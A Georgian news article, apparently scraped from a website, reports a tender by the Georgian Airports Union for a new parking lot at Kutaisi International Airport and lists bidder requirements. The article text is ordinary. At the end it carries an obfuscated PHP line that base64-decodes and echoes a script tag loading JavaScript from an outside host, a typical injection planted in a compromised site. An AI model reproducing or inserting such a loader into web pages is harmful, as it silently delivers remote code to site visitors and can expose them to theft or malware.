celsiusi
ავერსი საქკაბელი

საქართველოს აეროპორტების გაერთიანება ქუთაისის საერთაშორისო აეროპორტის მიმდებარე ტერიტორიაზე ავტოსადგომის მოწყობისთვის ტენდერს აცხადებს. შესყიდვის სავარაუდო ღირებულება 3 465 167 ლარია.

წინადადებების მიღება 9 მარტს დაიწყო და 14 მარტს დასრულდება.

სატენდერო დოკუმენტაციის მიხედვით, გათვალისწინებულია შპს „საქართველოს აეროპორტების გაერთიანების“ დავით აღმაშენებლის სახელობის ქუთაისის საერთაშორისო აეროპორტის ტერმინალის მიმდებარე ტერიტორიაზე ახალი ავტოსადგომის მოწყობის სამშენებლო სამუშაოები თანმდევი პროექტირებით.

„არსებული კონცეპტუალური დიზაინ-პროექტის მიხედვით, საჭიროა დაპროექტდეს და მოეწყოს ახალი პარკინგი რაც მოიცავს პარკინგების, საავტომობილო გზების და საფეხმავლო ბილიკების დაპროექტება მოწყობას, სანიაღვრე კანალიზაციის დაპროექტება მშენებლობას, ელექტრო სანათი ბოძების მონტაჟს, საჭირო ელექტრო ქსელის დაპროექტება მშენებლობას და დეკორატიული ღობის (არსებულის ანალოგიური) მოწყობას.

შემსრულებელმა სამშენებლო სამუშაოებთან ერთად, პარალელურად უნდა შექმნას საპროექტო დოკუმენტაცია არსებული დიზაინ-პროექტის მიხედვით“, - აღნიშნულია სატენდერო დოკუმენტაციაში.

რაც შეეხება მოთხოვნებს, რომელთაც პრეტენდენტი უნდა აკმაყოფილებდეს:

„პრეტენდენტს 2018 წლიდან წინამდებარე ტენდერის გახსნის დღემდე პერიოდში შესრულებული უნდა ჰქონდეს არანაკლებ 5 საგზაო ინფრასტრუქტურული ობიექტი, თითოეული არანაკლებ 15000 კვ.მ ფართის;

- პრეტენდენტს 2018 წლიდან წინამდებარე ტენდერის გახსნის დღემდე პერიოდში შესრულებული უნდა ჰქონდეს არანაკლებ ხუთი საგზაო ინფრასტრუქტურის მოწყობის საპროექტო მომსახურება, აქედან ერთ-ერთი უნდა მოიცავდეს არანაკლებ 500 ადგილიანი ავტოსადგომის პროექტირებას;

- პრეტენდენტის სამშენებლო სამუშაოების ბრუნვა 2018 წლიდან წინამდებარე ტენდერის გახსნის დღემდე პერიოდში უნდა შეადგენდეს ჯამურად არანაკლებ 61 000 000 ლარს დღგ-ს ჩათვლით“.

378
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");